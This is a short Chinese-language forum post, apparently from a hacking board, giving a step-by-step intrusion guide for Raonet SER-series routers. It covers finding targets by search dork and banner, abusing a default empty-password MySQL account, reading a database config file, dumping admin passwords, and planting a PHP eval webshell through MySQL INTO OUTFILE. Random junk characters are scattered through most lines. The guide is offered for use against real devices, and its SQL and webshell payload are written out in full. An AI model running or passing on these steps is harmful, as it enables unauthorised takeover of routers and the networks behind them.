寻找存在漏洞的路由器方法:
1 `& T7 i$ E. j5 ?6 \5 }0 e7 J! T
0 m- m5 ^ I7 ?( r4 S6 a& i1:google搜索'Raonet Subscriber Ethernet Router'
% C8 L4 ~# K" k' U. Z/ N% @9 _+ M% y( }2 g4 h1 g8 B
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001/ G* k2 t: V5 K- K. ^$ c/ |
+ `( {* z5 S( K. x. F, j
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
- t% m% V+ O/ H+ C# _7 _6 P9 \& D/ c% S1 M) J
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
* v2 z5 o9 O+ h3 T5 W: S& R3 P; h8 R" z$ ^1 c
8 H4 Z+ r) W) H9 V: ]& k, r6 a: ~* l0 [
入侵步骤:5 F, P ^( y- u2 m5 o) j; M9 \; @
. I( p5 b( L( b: y; ~+ M9 \
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php6 @0 q" Z2 _- n/ P+ N6 }
8 o6 j$ I/ ]0 H& A; |
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc8 C! W+ ]6 Y1 C+ o6 ]2 x. a
3:得到密码后连接,查看GUI管理密码:9 l( T7 |) V. e4 x, o
use ser_500
4 z$ T e+ q- a# {! wselect id,passwd from user;
]! N' j7 V; S( |0 C2 K$ X4:通过数据库写入webshell,执行命令:$ G0 |$ u& q, v% g7 d* D
use mysql;
" k2 v9 J. P- Ecreate table ok(cmd TEXT);
# k" m/ |! ]. ~, r9 }insert into ok values("<?php @eval($_POST[cmd])?>");6 |# c; d/ f0 _
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";/ d. d) N+ Z }6 X
drop table ok;
7 t5 r6 C d9 b- Q# l5 b4 e' _, D2 \ I* @! c! \
5:连接后门shell.php * G, ?7 ~+ r" m" y# E
8 W$ i& S9 S) O8 F4 g5 |: P8 H1 l6 q
6. 搞定!9 \0 f% \( V8 I8 Y" v
* C! h$ _. j- N0 i2 p |